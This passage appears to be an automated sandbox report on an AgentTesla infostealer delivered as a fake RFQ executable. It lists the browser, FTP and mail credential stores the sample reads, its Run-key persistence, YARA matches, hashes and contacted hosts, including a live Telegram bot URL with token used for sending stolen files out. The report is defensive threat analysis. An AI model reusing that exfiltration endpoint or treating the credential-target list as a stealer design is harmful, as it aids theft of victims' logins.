Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000002.00000002.3869447768.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.08(2)_00.exe.43f0218.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.08(2)_00.exe.43c61e8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.08(2)_00.exe.43f0218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.08(2)_00.exe.43c61e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.08(2)_00.exe.435a978.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3868083116.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1432692321.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3869447768.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	12 Process Injection	1 Deobfuscate/Decode Files or Information	211 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	1 Credentials in Registry	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	211 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
08(2)_00.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
08(2)_00.exe	71%	Virustotal		Browse
08(2)_00.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.ipify.org	0%	Virustotal		Browse
api.telegram.org	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument	0%	Virustotal		Browse
https://api.telegram.org	1%	Virustotal		Browse
http://api.telegram.org	2%	Virustotal		Browse
https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/	5%	Virustotal		Browse
https://notify-api.line.me/api/notify	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram	RegAsm.exe, 00000002.00000002.3869447768.0000000003500000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://api.ipify.org	RegAsm.exe, 00000002.00000002.3869447768.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
https://api.telegram.org	RegAsm.exe, 00000002.00000002.3869447768.0000000003287000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003447000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003500000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse	unknown
http://api.telegram.org	RegAsm.exe, 00000002.00000002.3869447768.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003447000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3869447768.0000000003500000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000002.00000002.3869447768.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/	RegAsm.exe, 00000002.00000002.3869447768.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	true	5%, Virustotal, Browse	unknown
https://notify-api.line.me/api/notify	08(2)_00.exe	false	0%, Virustotal, Browse	unknown
https://github.com/WindOfNet/CgLogListener	08(2)_00.exe	false		unknown
https://api.telegram.orgLJK	RegAsm.exe, 00000002.00000002.3869447768.00000000032FC000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524791
Start date and time:	2024-10-03 09:16:24 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	08(2)_00.exe renamed because original name is a hash value
Original Sample Name:	---RFQ_1282-2023.03.08(2)_00.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/8@3/2
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 100% Number of executed functions: 187 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 08(2)_00.exe, PID 5992 because it is empty
Execution Graph export aborted for target fOLFRQq.exe, PID 2916 because it is empty
Execution Graph export aborted for target fOLFRQq.exe, PID 4496 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:17:22	API Interceptor	10480132x Sleep call for process: RegAsm.exe modified
09:17:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fOLFRQq C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe
09:17:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fOLFRQq C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse
104.26.12.205	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	file.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	file.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	file.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.26.12.205
	z92BankPayment38_735.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.74.152
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.74.152
api.telegram.org	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WaUjTT0Wa1.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	tcU5sAPsAc.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	SCANNED COPY.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	doc_20241002_383767466374663543.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	All#att098764576.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	zR0pDxPfkZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.16.12
	DHL Receipt_AWB 9892671327.xls	Get hash	malicious	Unknown	Browse	172.67.216.244
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	MVR-00876 CARRARO ITALIA SPA.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Payment proof.xls	Get hash	malicious	Unknown	Browse	104.21.78.54
	5STdfnsEu5.exe	Get hash	malicious	LummaC	Browse	104.21.16.12
	MVR-00876 CARRARO ITALIA SPA.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Payment proof.xls	Get hash	malicious	Unknown	Browse	104.21.78.54

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 104.26.12.205
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 104.26.12.205
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220 104.26.12.205
	sostener.vbs	Get hash	malicious	Njrat	Browse	149.154.167.220 104.26.12.205
	sostener.vbs	Get hash	malicious	XWorm	Browse	149.154.167.220 104.26.12.205
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220 104.26.12.205
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc	Browse	149.154.167.220 104.26.12.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	rDoc5633276235623657_xls.exe	Get hash	malicious	StormKitty, XWorm	Browse
	lchs.exe	Get hash	malicious	Quasar	Browse
	Shipping Documemt.vbs	Get hash	malicious	Lokibot	Browse
	AaK2FmzNcl.exe	Get hash	malicious	LummaC	Browse
	SecuriteInfo.com.Trojan.Siggen29.33686.11630.12129.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.Siggen29.33686.11630.12129.exe	Get hash	malicious	Unknown	Browse
	pic4.jpg.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium, StormKitty	Browse
	file.exe	Get hash	malicious	RisePro Stealer	Browse
	lgnasdfnds.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\08(2)_00.exe.log

Download File

Process:	C:\Users\user\Desktop\08(2)_00.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	886
Entropy (8bit):	5.331475473299777
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhgLE4qE4j:MIHK5HKH1qHxviYHKh3ogLHqHj
MD5:	CE284AAE366CF0AD41BF68D2BAB853D2
SHA1:	74FAE49CCF87043AE8E7458BAA9DA143D3A255A0
SHA-256:	E12B3AFF2DC8FFB133C70AF84991B53847D466ED1DB587FC0BB3139B96CD4EB1
SHA-512:	11274B514B29B9D5BB7632A2ED4962DA898CA5500704316CDC5ABD38AA9D3549088EE01910E52F0B603ADA9337AE3DEC89412BD0D629EA4C32D0EDDB2D321A5C
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fOLFRQq.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: rDoc5633276235623657_xls.exe, Detection: malicious, Browse Filename: lchs.exe, Detection: malicious, Browse Filename: Shipping Documemt.vbs, Detection: malicious, Browse Filename: AaK2FmzNcl.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Siggen29.33686.11630.12129.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Siggen29.33686.11630.12129.exe, Detection: malicious, Browse Filename: pic4.jpg.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: lgnasdfnds.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\Users\user\AppData\Roaming\lqadtknr.kra\Chrome\Default\Network\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\lqadtknr.kra\Edge Chromium\Default\Network\Cookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\lqadtknr.kra\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	modified
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1049
Entropy (8bit):	4.286073681226177
Encrypted:	false
